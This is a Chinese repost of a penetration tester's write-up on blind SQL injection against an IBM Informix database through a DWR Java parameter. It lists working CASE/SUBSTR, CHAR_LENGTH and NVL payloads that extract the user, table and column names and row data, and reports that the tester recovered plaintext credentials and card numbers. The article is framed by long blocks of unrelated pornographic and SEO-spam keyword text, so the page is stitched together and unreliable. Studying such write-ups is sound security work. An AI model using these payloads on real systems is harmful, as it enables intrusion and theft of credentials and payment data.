精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Informix數據庫SQL注入實戰

安全 數據安全
在最近的應用程序滲透測試中,我發現一個有意思的sql漏洞(SQLI中)。本文,筆者來介紹他遇到的問題以及如何解決并dump數據庫。

在最近的應用程序滲透測試中,我發現一個有意思的sql漏洞(SQLI中)。

SQLI出現這種情況的原因:

1.開發中帶來的問題

2.數據庫正在使用

下面,我來介紹我遇到的問題以及如何解決并dump數據庫。該應用程序使用一種名為DWR后端的JAVA遠程調用框架,系統調用是這樣的:

Informix數據庫SQL注入實戰

這是位于C0-param1的參數,從表面上看起來很容易,因為它給了詳細的錯誤信息,當一個單引號被添加到參數尾部時,會得到以下錯誤信息:“java.sql.SQLException: A syntax error has occurred.”(語法錯誤)

Informix數據庫SQL注入實戰

c0-param1參數控制有多少結果從數據庫中檢索出來,這注射點出現在類似于mssql的TOP keyword位置和MYSQL的Limit。我認為SQLI跑MSSQL庫比MYSQL更合適。我添加一系列請求如下圖所示:

Informix數據庫SQL注入實戰

執行查詢后,得到一個錯誤信息:“java.sql.SQLException: The column (card_no) must be in the GROUP BY list.”數據庫系統是IBM的Informix,我對Informix了解甚少,所以還得一個函數一個函數地查IBM的文檔。

現在知道這是Informix,能幫助我們對次注射是怎么產生的,第一個子句,類似TOP和LIMIT,查詢起來是這樣的:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

如果條件為真(即當前用戶名的第一個字母為'a'),查詢將返回結果,反則會報錯,因為子查詢(SELECT 1 FROM SYSTABLES)會返回多個結果。然而,又有難題了,不能使用等號,通過替換,使用以下語句:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

有了這些注射知識和概念就好整多了,掏出sqlmap(從我的同事那里弄到了些小技巧,而且觀摩了他的帖子“Sqlmap的高級注入技巧”),Sqlmap的確是很好的工具,作者是今年在大會上認識的一個很不錯的家伙寫的。。。好像跑題了。不過遺憾的是,Sqlmap不支持Informix,所以我不得不自己寫工具了:

獲取表名的長度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

獲取表名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

獲取有表中有多少列:

c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

獲取列名長度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

獲取列名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通過一個小研究,我發現Informix的表實際上有一個隱藏很深的列名:ROWID,每一行都存在一個這樣的序列號。然而,這些ROWID可以分散,刪除或插入到表。為了找到包含數據的ROWID,我調用一個名為NVL的函數,這個函數可以返回不同的結果,具體取決于第一個參數是否為NULL。最終找到一處可能總是包含數據的一列,語句:

c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通過這種方法,能夠發現純文本應用程序憑據,明文銀行SFTP憑證和未加密的支付卡號碼。

隨著這一成功,明白了以前對Informix數據庫想知道的。

原文地址:http://blog.spiderlabs.com/2013/12/the-case-of-an-obscure-injection.html

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2013-07-25 20:36:02

2009-01-07 09:46:18

InformixOnline數據庫

2010-04-12 08:59:00

2022-11-04 08:34:27

Oracle數據庫

2010-09-09 14:31:31

SQL函數數據庫

2017-05-18 12:45:57

Informix-On備份數據庫

2013-04-26 11:39:40

2010-09-30 09:11:01

2009-03-09 09:26:49

Informix數據庫管理OLTP

2011-03-04 10:30:25

ASP數據庫

2015-09-15 16:29:25

2009-10-09 15:20:12

2011-03-25 09:46:16

Informix數據庫安全性安全審計

2010-07-15 17:28:50

SQL Server

2010-06-30 08:46:51

升級SQL Serve

2022-12-07 18:45:22

內存數據庫Redis

2021-05-17 06:57:34

SQLServer數據庫

2012-12-10 10:57:04

IBMdW

2018-02-10 09:44:19

2010-07-30 09:49:05

點贊
收藏

51CTO技術棧公眾號

婷婷国产精品| 在线天堂新版最新版在线8| 国产一区不卡精品| 性欧美长视频免费观看不卡 | 国产成人一区在线| 浅井舞香一区二区| 男女性高潮免费网站| 日韩丝袜视频| 日韩三级在线观看| 黄色av免费在线播放| 中中文字幕av在线| 国产视频不卡一区| 国产精品乱码一区二区三区| 中国女人真人一级毛片| 黄色亚洲在线| 自拍偷拍亚洲区| 涩视频在线观看| 亚洲成人a级片| 欧美丝袜一区二区| 99久久免费观看| 91在线视频免费看| 26uuu国产在线精品一区二区| 成人精品久久久| 免费看日批视频| 伊人狠狠色j香婷婷综合| 最近2019中文字幕mv免费看 | 综合分类小说区另类春色亚洲小说欧美 | 日韩三级小视频| 亚洲成av人电影| 揄拍成人国产精品视频| aaaaa一级片| 国语一区二区三区| 欧美大片拔萝卜| 日本网站在线看| 精品久久久网| 在线亚洲一区二区| 免费大片在线观看| 欧美亚洲韩国| 日韩欧美在线观看视频| 毛片在线播放视频| 国产精品探花在线| 一区二区三区四区激情| av电影一区二区三区| 欧美成人高清在线| 国产精品国产三级国产aⅴ中文| 秋霞毛片久久久久久久久| 五月婷婷开心中文字幕| 91在线视频官网| 国产一区二区三区免费不卡| 丰满岳乱妇国产精品一区| 国产精品一区二区男女羞羞无遮挡| 国产精品视频一| 中国黄色一级视频| 久久精品国产**网站演员| 国产精品久久久久影院日本| 国产99免费视频| 日韩高清一区在线| 国产精品国产自产拍高清av水多| 亚洲国产av一区二区三区| 久久一区亚洲| 国产精品久久久久久久天堂| 日韩国产亚洲欧美| 麻豆精品在线播放| 91在线国产电影| 性一交一乱一乱一视频| 成人18视频在线播放| 久久国产一区| 国产私拍精品| 亚洲女与黑人做爰| 17c丨国产丨精品视频| 99爱在线观看| 一本一道久久a久久精品| 另类小说第一页| 国产精品久一| 亚洲аv电影天堂网| 水蜜桃av无码| 精品久久视频| 久久国产天堂福利天堂| 国产精品第九页| 天使萌一区二区三区免费观看| 国产精品网红直播| 性少妇videosexfreexxx片| 成人国产精品免费观看视频| 欧美精品123| 国产秀色在线www免费观看| 亚洲午夜视频在线观看| 成年人小视频网站| 精品国产亚洲一区二区三区在线| 亚洲成人久久久久| 日本精品在线观看视频| 97人人精品| 亚州欧美日韩中文视频| 在线不卡免费视频| 国产.欧美.日韩| 日韩久久在线| 国产色婷婷在线| 欧美吻胸吃奶大尺度电影| 日本成人在线免费| 精品国产乱码久久久久久1区2匹| 久久天堂av综合合色| 日韩精品在线观看免费| 精品一区二区三区视频在线观看 | 亚洲 欧美 激情 另类| 中文乱码免费一区二区| 秋霞无码一区二区| 天天综合在线观看| 精品视频在线观看日韩| 顶臀精品视频www| 久久精品亚洲| 国产精品一区二区三区精品| 尤物网在线观看| 狠狠色狠狠色综合日日五| 欧美日韩久久婷婷| 不卡视频在线| 欧美在线一级视频| 性欧美18一19性猛交| 国产精品久久久久久久久免费樱桃| www国产精品内射老熟女| 九色精品蝌蚪| 最好看的2019年中文视频| 黄色大片网站在线观看| 成人一区在线看| 8x8x华人在线| 亚洲人成777| 在线观看视频99| 亚洲 日本 欧美 中文幕| 成人免费福利片| 国产亚洲精品久久久久久久| 国产一区精品福利| 一本色道久久88亚洲综合88| 欧美一级片免费在线观看| 成人综合在线观看| 四虎4hu永久免费入口| 亚洲男女网站| 久久久精品国产网站| 中文字幕一二三四| 国产精品婷婷午夜在线观看| 少妇人妻互换不带套| 蜜桃精品噜噜噜成人av| 清纯唯美亚洲综合| 免费在线稳定资源站| 欧美性猛交xxxx黑人| 捆绑凌虐一区二区三区| 亚洲免费黄色| 久久99影院| 亚洲精品福利电影| 亚洲精品视频网上网址在线观看| 国产一级特黄a高潮片| 国产v日产∨综合v精品视频| 大胆欧美熟妇xx| 99re8这里有精品热视频免费| 欧美激情中文网| 人成网站在线观看| 精品久久久久久中文字幕| a天堂视频在线观看| 国产精品乱看| 欧美在线播放一区| 国产亚洲欧美日韩精品一区二区三区| 色爱精品视频一区| av官网在线观看| 亚洲综合成人网| 变态另类丨国产精品| 久久一综合视频| 亚洲精品国产一区| 国产一区二区av在线| 色综合视频一区中文字幕| 日批视频在线播放| 色综合色综合色综合色综合色综合 | 久久www视频| 国产精品毛片视频| 欧美专区在线播放| 91免费在线| 欧美一级高清片| 国产精品黄色网| 欧美国产乱子伦 | 久热精品在线视频| 乱精品一区字幕二区| 色综合久久综合中文综合网| 欧美性受xxxx黑人| 国产福利一区二区| 欧美 激情 在线| 99热国内精品| 久久久水蜜桃| 国产一区 二区| 欧美一区二区三区四区在线| 幼a在线观看| 精品国产免费人成在线观看| 国产精品免费无遮挡无码永久视频| 国产精品三级av| 午夜剧场免费看| 美腿丝袜在线亚洲一区| 欧美黄色免费网址| 神马久久一区二区三区| 97人人模人人爽人人少妇| 一本大道色婷婷在线| 久久精品视频免费播放| 欧美新色视频| 日韩一区二区在线观看视频 | 欧美xxxx老人做受| 亚洲av无码不卡| 亚洲国产视频在线| 91禁男男在线观看| 91香蕉视频mp4| 岛国大片在线免费观看| 人人狠狠综合久久亚洲| 老太脱裤让老头玩ⅹxxxx| 亚欧美无遮挡hd高清在线视频| 欧美xxxx黑人又粗又长精品| 精品伊人久久| 国产日韩av高清| 伊人网在线播放| 欧美国产精品日韩| 国产高清一区二区三区视频| 亚洲夜晚福利在线观看| 动漫av一区二区三区| 盗摄牛牛av影视一区二区| 国产蜜臀av在线一区二区三区| 日韩成人精品视频在线观看| 久久精品国产清高在天天线| 免费看欧美一级片| 伊人成综合网| 涩涩涩999| 西瓜成人精品人成网站| 国产chinese精品一区二区| 小说区图片区亚洲| 国产精品揄拍500视频| 黑人巨大亚洲一区二区久| 午夜精品一区二区三区av| 七七久久电影网| 久久精品久久精品亚洲人| 在线观看麻豆蜜桃| 亚洲最新在线视频| 大胆av不用播放器在线播放| 日韩国产在线看| 天堂国产一区二区三区| 精品国产一区二区在线观看| 国产视频在线观看免费| 欧美高清影院| 色999日韩欧美国产| www.久久热.com| 在线中文字幕日韩| jizz视频在线观看| 少妇高潮久久77777| 男人天堂久久久| 日韩一区二区欧美| 国产在线高清视频| 欧美尺度大的性做爰视频| 2024短剧网剧在线观看| 欧美大尺度在线观看| 在线观看三级视频| 欧美福利小视频| h片在线观看下载| 91极品女神在线| 亚洲色图官网| 国产精品久久久久久久久久东京| 精品三级在线| 亚洲一区二区三区久久 | 亚洲午夜久久久久久久国产| 久久综合色之久久综合| 一道本在线观看| 中文一区二区在线观看| www深夜成人a√在线| 亚洲一区在线视频观看| 国产一级做a爱片久久毛片a| 在线观看欧美精品| 国产精品伦一区二区三区| 欧美电影免费观看完整版| 天堂在线资源库| 中文精品99久久国产香蕉| 操你啦在线视频| 久久久伊人欧美| 日本电影欧美片| 成人久久久久爱| 国偷自产av一区二区三区| 欧美一区二区视频在线| 一区二区电影| 久久久999视频| 日本不卡的三区四区五区| 在线播放黄色av| 91一区二区在线观看| 无码人中文字幕| 亚洲va韩国va欧美va| 一级特黄免费视频| 日韩视频在线你懂得| 日韩porn| 欧美xxxx做受欧美| 欧美自拍电影| 999国内精品视频在线| 国产伦精品一区二区三区视频| 欧美与动交zoz0z| 欧美一级专区| 男生和女生一起差差差视频| 久久久久久久综合狠狠综合| 青娱乐在线视频免费观看| 在线一区二区三区四区五区 | 99亚洲男女激情在线观看| 精品国产免费久久久久久尖叫 | 久久久天堂av| 久久无码精品丰满人妻| 在线看一区二区| 日韩一级片免费看| 久久天堂av综合合色| 全球最大av网站久久| 国产在线精品一区二区三区| 亚洲天天综合| 激情综合网俺也去| 99久久久无码国产精品| 国产黄色片在线免费观看| 欧美视频一区二区| 日本成人一区| 欧美精品18videos性欧| 日韩三级一区| 亚洲 日韩 国产第一区| 亚洲免费中文| 中国极品少妇xxxx| 亚洲精品久久久蜜桃| 在线免费看毛片| 亚洲性视频网址| 久久uomeier| 久久精品国产一区二区三区日韩| 国产精品vip| 伊人成人免费视频| 国产精品久久毛片av大全日韩| 99精品人妻国产毛片| 精品香蕉在线观看视频一| 99爱在线视频| 国产女人水真多18毛片18精品| 一本精品一区二区三区| www.com污| 中文字幕一区二区三区视频| 一级特黄免费视频| 一区二区欧美日韩视频| 在线视频超级| 欧美一区二区福利| 亚洲综合不卡| 中文字幕在线看高清电影| 欧美日韩在线另类| 日韩亚洲视频在线观看| 欧美一级大片视频| 亚洲最大在线| 999香蕉视频| 国产日韩欧美麻豆| 亚洲无码精品一区二区三区| 国产午夜精品一区理论片飘花| 欧美日韩五码| 亚洲国内在线| 狠狠网亚洲精品| 日本精品人妻无码77777| 欧美刺激午夜性久久久久久久| 福利网站在线观看| 国内视频一区| 肉色丝袜一区二区| 99国产精品无码| 7777精品伊人久久久大香线蕉超级流畅| 麻豆免费在线视频| 91九色在线观看| 亚洲乱码久久| 精品成人无码一区二区三区| 欧美午夜精品久久久久久超碰| 欧美尤物美女在线| 99视频免费观看蜜桃视频| 亚洲午夜极品| 在线 丝袜 欧美 日韩 制服| 精品视频全国免费看| 国产成人午夜| 精品福利影视| 日本伊人午夜精品| 一起操在线播放| 亚洲国产古装精品网站| 日韩伦理三区| 一区高清视频| 粉嫩一区二区三区在线看| 亚洲免费黄色网址| 上原亚衣av一区二区三区| 911精品国产| 漂亮人妻被中出中文字幕| 中文字幕在线一区二区三区| 亚洲乱码精品久久久久..| 日本久久久久久久久久久| 欧美疯狂party性派对| 国产女主播在线播放| 欧美中文字幕一区二区三区| 在线观看中文字幕的网站| 开心色怡人综合网站| 国模一区二区三区白浆| 亚洲黄色三级视频| 久久激情五月丁香伊人| 牛牛精品成人免费视频| 国产又黄又猛又粗| 亚洲在线一区二区三区| 国产免费av在线| 99视频日韩| 裸体一区二区三区| 日本免费一二三区| 色老头一区二区三区在线观看| 国语一区二区三区| www激情五月| 欧洲一区二区三区在线| 99色在线观看| 欧美做暖暖视频|